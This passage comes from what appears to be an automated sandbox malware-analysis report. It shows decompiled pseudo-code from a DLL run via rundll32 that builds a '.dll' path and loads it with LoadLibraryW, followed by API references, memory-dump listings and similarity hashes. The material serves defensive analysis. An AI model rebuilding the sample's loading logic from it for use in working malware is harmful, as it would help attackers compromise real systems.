                                                                                                                                                                                                                                                                            				_t17 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            				_t3 = _t17 + 0xa8; // 0x1
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				_t22 = E100091B2(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
                                                                                                                                                                                                                                                                            				_t56 = "\\";
                                                                                                                                                                                                                                                                            				_t23 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            				_t60 = E100099EC(_t23 + 0x1020);
                                                                                                                                                                                                                                                                            				_v12 = _t60;
                                                                                                                                                                                                                                                                            				E10009E2E( &_v8);
                                                                                                                                                                                                                                                                            				_t29 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            				_t57 = E100099EC(_t29 + 0x122a);
                                                                                                                                                                                                                                                                            				_t32 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            				_v8 = _t57;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
                                                                                                                                                                                                                                                                            				_t61 = LoadLibraryW(_t57);
                                                                                                                                                                                                                                                                            				if(_t61 != 0) {
                                                                                                                                                                                                                                                                            					_push(_t61);
                                                                                                                                                                                                                                                                            					_t54 = 0x40;
                                                                                                                                                                                                                                                                            					_t43 = E1000950E(0x1001d9c0, _t54);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E10009203( &_v12, 0xfffffffe);
                                                                                                                                                                                                                                                                            				E1000936A( &_v140, 0, 0x80);
                                                                                                                                                                                                                                                                            				if(_t43 != 0) {
                                                                                                                                                                                                                                                                            					 *0x100210b0 = _t61;
                                                                                                                                                                                                                                                                            					 *0x100210b8 = _t57;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E10009203( &_v8, 0xfffffffe);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t43;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x1000a2fb
                                                                                                                                                                                                                                                                            0x1000a2fd
                                                                                                                                                                                                                                                                            0x1000a302
                                                                                                                                                                                                                                                                            0x1000a308
                                                                                                                                                                                                                                                                            0x1000a30b
                                                                                                                                                                                                                                                                            0x1000a311
                                                                                                                                                                                                                                                                            0x1000a334
                                                                                                                                                                                                                                                                            0x1000a339
                                                                                                                                                                                                                                                                            0x1000a33e
                                                                                                                                                                                                                                                                            0x1000a346
                                                                                                                                                                                                                                                                            0x1000a353
                                                                                                                                                                                                                                                                            0x1000a35a
                                                                                                                                                                                                                                                                            0x1000a361
                                                                                                                                                                                                                                                                            0x1000a372
                                                                                                                                                                                                                                                                            0x1000a378
                                                                                                                                                                                                                                                                            0x1000a37b
                                                                                                                                                                                                                                                                            0x1000a392
                                                                                                                                                                                                                                                                            0x1000a3a6
                                                                                                                                                                                                                                                                            0x1000a3a8
                                                                                                                                                                                                                                                                            0x1000a3ad
                                                                                                                                                                                                                                                                            0x1000a3b3
                                                                                                                                                                                                                                                                            0x1000a3c0
                                                                                                                                                                                                                                                                            0x1000a3c4
                                                                                                                                                                                                                                                                            0x1000a3c6
                                                                                                                                                                                                                                                                            0x1000a3c9
                                                                                                                                                                                                                                                                            0x1000a3d5
                                                                                                                                                                                                                                                                            0x1000a3d5
                                                                                                                                                                                                                                                                            0x1000a3dd
                                                                                                                                                                                                                                                                            0x1000a3f0
                                                                                                                                                                                                                                                                            0x1000a3fa
                                                                                                                                                                                                                                                                            0x1000a40b
                                                                                                                                                                                                                                                                            0x1000a411
                                                                                                                                                                                                                                                                            0x1000a3fc
                                                                                                                                                                                                                                                                            0x1000a402
                                                                                                                                                                                                                                                                            0x1000a408
                                                                                                                                                                                                                                                                            0x1000a41d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 1000C172: _vsnwprintf.MSVCRT ref: 1000C18F
                                                                                                                                                                                                                                                                              • Part of subcall function 100099EC: lstrcatW.KERNEL32(00000000,?), ref: 10009A2B
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 1000A3BA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad_vsnwprintflstrcat
                                                                                                                                                                                                                                                                            • String ID: %08x$dll
                                                                                                                                                                                                                                                                            • API String ID: 1445519121-2963171978
                                                                                                                                                                                                                                                                            • Opcode ID: ee69ddeb78258e57ff159ad9a30d3da6fa3b71f745943adbbaa0d20dd1f6eede
                                                                                                                                                                                                                                                                            • Instruction ID: da7a666e81fd9e8665abe568421c0efaf6e603c8ab56a2e2e86a9924a4d9d885
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee69ddeb78258e57ff159ad9a30d3da6fa3b71f745943adbbaa0d20dd1f6eede
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77310776A042147BF750E7649C86FDB36ADEB85790F200175F204E7286DE74DE8587A0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%